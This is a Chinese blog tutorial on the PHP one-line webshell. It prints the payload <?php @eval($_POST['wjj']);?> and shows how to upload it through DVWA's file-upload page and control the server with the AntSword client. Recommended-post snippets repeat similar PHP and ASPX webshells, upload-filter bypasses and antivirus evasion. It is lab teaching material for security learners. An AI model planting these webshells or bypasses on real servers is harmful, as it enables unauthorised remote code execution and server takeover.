一句话木马实践

已于 2022-11-18 14:55:31 修改
阅读量682 收藏 6
点赞数 1
文章标签: php
于 2022-11-16 21:12:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wjj985666/article/details/127893011
版权

基本原理:运用文件上传漏洞往目标网站中上传一句话木马

首先用记事本创建一个简单的一句话木马

如:

<?php @eval($_POST['wjj']);?>

POST里面的就是我们的链接密码,wjj是参数,这句话就是一个PHP一句话木马。eval()这个函数的作用就是把参数当作PHP代码来执行

首先要把我们的一句话木马生成为一个文件,把文件名后缀改为.php,一句话木马就形成了。

 之后通过dvwa平台的文件上传文件,实践木马。

1、首先在找到DVWA security将安全级别改为low

2、打开File Upload上传木马文件

 如图所示上传成功

3、复制木马文件上传的地址 使用中国蚁剑 右键添加数据 蚁剑的安装及使用教程可以自行查找

url地址即文件上传地址

密码为函数的$_POST['wjj']里面的wjj

完成后双击即可查看服务器主机的所有目录。

wjj985666
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
一句话木马原理与实战
V
07-30 3174
一句话木马原理与实战介绍常用一句话木马分析一句话木马一句话使用方法实战 介绍 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终有强大的作用。 常用一句话木马 php一句话木马:    <?php @eval($_POST[value]);?>    aspx一句话木马:   <%@ Page Language=“Jscript”%>   <%eval(Re...
一句话木马
热门推荐
qq_53065516的博客
03-27 2万+
一:一句话木马:标准代码形式:<?php @eval($_POST[‘attack’]) ?> eval()函数表示括号内的语句字符串什么的全都当做代码执行POST[‘attack’]表示从页面中获得attack这个参数值。常见形式:php一句话木马:<?php@eval(_POST[‘attack’]表示从页面中获得attack这个参数值。 常见形式: php一句话木马: <?php @eval(P​OST[‘attack’]表示从页面中获得attack这个参数值。常见形式:p
一句话木马全攻略
天马行空
05-21 1666
大家都知道入侵网站拿Webshell的时候一般思路有备份和上传小马然后写大马。然后比较多的就是用一句话来拿Webshell.但是对于新手。如何正确使用一句话呢?这就是本问讲到的,请大家看下文---------------------------------------------------------------------------------------------------
文件上传漏洞
m0_70683009的博客
05-21 1139
如果对方中间件是apache属于低版本,我们可以利用文件上传,上传一个不识别的文件后缀,利用解析漏洞规则成功解析文件,其中的后门代码被执行。,可以被当作php文件进行解析,从最后一个.mmm开始,apache不认识,就往前走,一直到.php,这样即绕过了验证,有可以进行解析。⑤:不删除末尾的点,在后缀名加点(需要在抓到的数据包中加点,直接在文件后缀名加点会命名不成功,它会自动删除点)(2) 当上传文件.asp;上传可以上传的文件,在文件地址后加上/x.php,可以让文件以php代码去执行。
文件上传漏洞------一句话木马原理解析
m0_69151365的博客
03-11 1302
这是一个最简单的一句话木马,我们用GET传参接受了两个参数,其最终目的是构造出:assert($_GET['1']) -> assert(eval(phpinfo()))这样的语句。我们也可以直接构造eval,但是很容易被杀,在我个人电脑上我们可以关闭保护软件,但是我们可以关闭网站服务器的杀毒软件吗?这串代码是在对上一个代码进行base64解码,完了我们还要执行assert(eval(muma)) 这就是一句话木马的总体原理。我们设置成不允许,刷新靶场再次上传木马文件发现上传成功了。接下来就开始抓包了。
实验6 一句话木马
Sum
06-02 1064
实验6 一句话木马 一、文件上传漏洞 预备知识 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。 大部分的网站和应用系统都有上传功能,如用户头像上传,图片上传,文档上传等。一些文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型,导致允许攻击者向某个可通过Web访问的目录上传任意PHP/JSP/ASPX/ASP文件,并能够
PHP一句话木马实验
A1956936030的博客
09-14 1153
1.打开phpstudy 启动Apache 打开网站根目录 新建shell.php文本文件 编辑内容为(可使用notepad++编辑) 2.进入靶机 找到上传文件点并上传shell.php文件 3.在新闻管理中找到实验1点击修改 点击文件右键选择在 ‘新标签页中打开图片’ 显示如下图则成功 4.打开蚁剑 单击空白处点击右键’添加数据’ URL地址为步骤3中 '新标签页中打开图片’的地址 连接密码为shell(@eval($_POST[‘shell’]);) 添加成功 找到flag
一句话木马简单实践
qq_48732306的博客
12-17 1798
最近学习看到了一句话木马这个东西,觉得很有意思,那就来试试吧! 什么是一句话木马: 类似于<?php @eval($_POST['qiuy']);?>,POST里面的就是我们的链接密码。这句话是很明显就是一个PHP一句话木马。eval()这个函数的作用就是把参数当作PHP代码来执行,无论你传入的是啥。比如: eval(echo flag.txt),那么就执行了echo flag.txt这个命令。 类似的还有asp的一句话木马:<%eval request(“qiuy”)%> 如何使用
一句话木马和中国菜刀的结合拿webshell
weixin_30552811的博客
06-03 1027
什么叫做一句话木马: 就是一句简单的脚本语言,一句话木马分为Php,asp,aspx等 中国菜刀: 连接一句话木马的工具 实验的目的: 通过一句话木马来控制我们的服务器,拿到webshell。 实验环境说明: 上传一句话木马到网站的根目录下: 然后通过中国菜刀连接: 获取wensell ,文件目录等等: 转载于:http...
Web安全-用一句话木马拿下RDCTF靶机实战1
qq_46231152的博客
09-15 611
一句话木马 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 本次使用的php一句话: <?php @eval($_POST['1']) ?> 用这段代码保存为一个php后门木马 上传木马 本次使用的是RDCTF平台的靶机实战 进入管理员后台界面 找到附件管理,发现了这里可以上传文件 将写好的一句话木马上传 回到首页,找到文件上传的网页 找到一句话木马文件 使用蚁剑连接 拿到flag ...
aspx一句话木马_这场旋转的木马童话主题婚礼,实战太梦幻了
weixin_34885009的博客
12-28 77
旋转的木马和粉色的棉花糖,都被锁上了名为成长的锁。但总有人会拿着对的钥匙,小心翼翼打开,放出那些你五彩斑斓的梦,圆满你的所有期待和梦想。也许这就是遇上对的人的状态吧,小心呵护你所有的天真的梦想,细心为你编织一个五彩斑斓的童话梦,做那个无忧无虑的小公主。童话是五彩斑斓充满童趣的,在高饱和度的色彩下附上了一层梦幻的色彩。因此,在颜色的选择上,我们选用静谧蓝和茱萸粉这一对极富艺术气息的浪漫色彩来为这场婚...
一句话木马要点和防范注意事项
最新发布
05-24
一句话木马要点和防范注意事项
一句话 asp木马加密版 彻底突破杀毒软件
01-02
不知道怎样表达清楚。看例子吧: 代码如下:[removed] Execute(HextoStr(“65786563757465287265717565737428636872283335292929”)) Function HextoStr(data) HextoStr=”EXECUTE “”””” C=”&CHR(&H” N...
php一句话cmdshell新型 (非一句话木马)
10-30
php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
一句话图片木马讲解.rar
08-25
一句话图片木马讲解,一句话图片木马讲解,一句话图片木马讲解
一句话木马是如何被执行的?
weixin_40950781的博客
08-18 2853
一句话木马是如何被执行的0x01 什么是一句话0x02 最最典型的一句话小马0x03 大马与小马0x04 一句话小马是如何执行的呢 0x01 什么是一句话 一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数种变形,但本质是不变的:木马的函数执行了我们发送的命令。 0x02 最最典型的一句话小马 asp一句话:<%eval r...
上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)
tmzy1的博客
03-24 3526
上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)
excel一句话木马
01-26
Excel一句话木马是一种利用Excel文件进行攻击的恶意软件。它通过在Excel文件中嵌入恶意宏代码来实现攻击目标。当用户打开包含恶意宏代码的Excel文件时,该代码会在用户的计算机上执行,并可能导致系统被入侵或数据被...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值